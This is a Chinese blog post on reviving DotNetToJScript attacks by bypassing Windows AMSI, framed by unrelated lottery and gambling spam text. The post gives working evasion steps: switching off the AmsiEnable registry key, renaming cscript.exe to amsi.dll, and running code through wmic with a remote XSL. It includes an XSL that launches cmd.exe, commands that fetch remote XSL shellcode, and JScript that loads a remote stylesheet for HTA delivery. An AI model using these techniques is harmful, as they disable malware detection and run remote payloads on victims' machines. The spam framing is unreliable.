福彩3d出号走势图彩乐乐
3D任5选2组合遗漏分析 福彩3d跨度走势图带连线图 3d和尾走势图带连线 福彩3d和值走势图500期 3d和尾走势图大全 福彩3d大小奇偶走势图500期 今天3d试机号分析 福彩3d组三走势图带连线图 彩票3d试机号分析 福彩3d和值走势图带连线易彩网 福彩3d出号走势图彩宝贝 彩吧助手福彩3d出号走势图 福彩3d和值走势图带线 3d试机号分析17500 南方福彩3d跨度走势图带连线
DotNetToJScript 復活之路
in 技術分享奇技淫巧 with 0 comment

DotNetToJScript 復活之路

in 技術分享奇技淫巧 with 0 comment

0x00 簡介

去年James Forshaw開源了一個工具DotNetToJScript,能夠利用JS、Vbs等腳本加載.Net程序。再此工具發布以后,很多很多的工具也在此基礎上產生,比如StarFightersCACTUSTORCHSharpShooter等等,基于腳本的攻擊也隨之越來越多,所以在win10中,微軟引入了AMSI,并將基于DotNetToJScript的腳本特征加入到檢測之列。并將此工具標記為惡意軟件。如果直接運行通過DotNetToJScript生成的腳本,便會直接攔截,如下圖
1530067126795.png
最近,學到了兩種bypass的方式,所以進行一下分享。

0x01 禁用AMSI

這里講的禁用AMSI并不需要高權限,只需要一個簡單的Trick,這個是從這篇文章學來的,通過Process Monitor 進行查看,設置以下過濾器:
1530067444682.png
運行通過DotNetToJScript生成的腳本,可以監控到以下調用過程:
1530067501155.png
這里我們可以看到,在加載AMSI之前,查詢了以下注冊表鍵值HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable,嘗試修改此鍵值為0:
1530067589819.png
再次運行腳本,可以看到shellcode成功執行了,如下圖:
bypass
雖然修改注冊表可以實現禁用AMSI,但是需要高權限,那怎樣才可以在普通權限下禁用AMSI,其實通過@tiraniddo的文章我們可以看到,其實可以通過DLL劫持來進行繞過。通過Process Monitor可以看到檢測過程中調用了C:\Windows\System32\amsi.dll,如果我們把cscript.exe 重命名成amsi.dll會怎么樣呢?

copy c:\windows\system32\cscript.exe amsi.dll
amsi.dll evil.js

dllhijack

可以看到成功shellcode 成功執行了,修改過濾器如下:
1530068708904.png
我們來看一下調用過程
1530068764803.png
可以看到,現在已經沒有調用C:\Windows\System32\amsi.dll,這也就讓我們成功執行了我們的shellcode。

0x02 利用wmic

Casey [email protected]在博客分享的一個技巧,使用wmic能夠從本地或從URL調用XSL(可擴展樣式表語言)腳本。經過測試,通過此方式來調用DotNetToJScript的腳本也是可以成功執行的。subTee的文章在這。利用命令如下:

#Local File
wmic process list /FORMAT:evil.xsl
#Remote File
wmic os get /FORMAT:"https://example.com/evil.xsl"

evil.xsl

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
    <ms:script implements-prefix="user" language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
    ]]> </ms:script>
</stylesheet>

修改好的腳本,可以看這里:戳我
使用一下命令則可執行shellcode

wmic os get /FORMAT:"https://raw.githubusercontent.com/Ridter/AMSI_bypass/master/shellcode.xsl"

但是使用wmic執行的時候會有一個問題,在powershell下執行會失敗。如下圖:
1530081940192.png

那么怎么調用呢?
在讀了mdsec的這篇文章以后,我們發現,其實是可以通過COM來調用的。用javascript寫可以這樣:

var xml = new ActiveXObject("Microsoft.XMLDOM");
xml.async = false;
var xsl = xml;
xsl.load("http://host/a.xsl");
xml.transformNode(xsl);
self.close();

那這樣我們就可以構造HTA來遠程調用了。為了方便使用,我已經寫好了一個aggressor腳本,地址:
GITHUB:

使用如下圖:
demo

0x03參考

https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
https://subt0x11.blogspot.ca/2018/04/wmicexe-whitelisting-bypass-hacking.html?m=1
https://www.mdsec.co.uk/2018/06/freestyling-with-sharpshooter-v1-0/

Responses
福彩3d出号走势图彩乐乐
3D任5选2组合遗漏分析 福彩3d跨度走势图带连线图 3d和尾走势图带连线 福彩3d和值走势图500期 3d和尾走势图大全 福彩3d大小奇偶走势图500期 今天3d试机号分析 福彩3d组三走势图带连线图 彩票3d试机号分析 福彩3d和值走势图带连线易彩网 福彩3d出号走势图彩宝贝 彩吧助手福彩3d出号走势图 福彩3d和值走势图带线 3d试机号分析17500 南方福彩3d跨度走势图带连线
百宝彩电子走势 17175棋牌游戏 腾讯欢乐捕鱼cd-key兑换码怎么兑换 qq游戏 国标麻将 微信麻将作弊软件下载 飞艇双面盘 北京体彩十一选五一定牛 球深比分网即时比分西甲 下载湖南麻将 北京麻将作弊器免费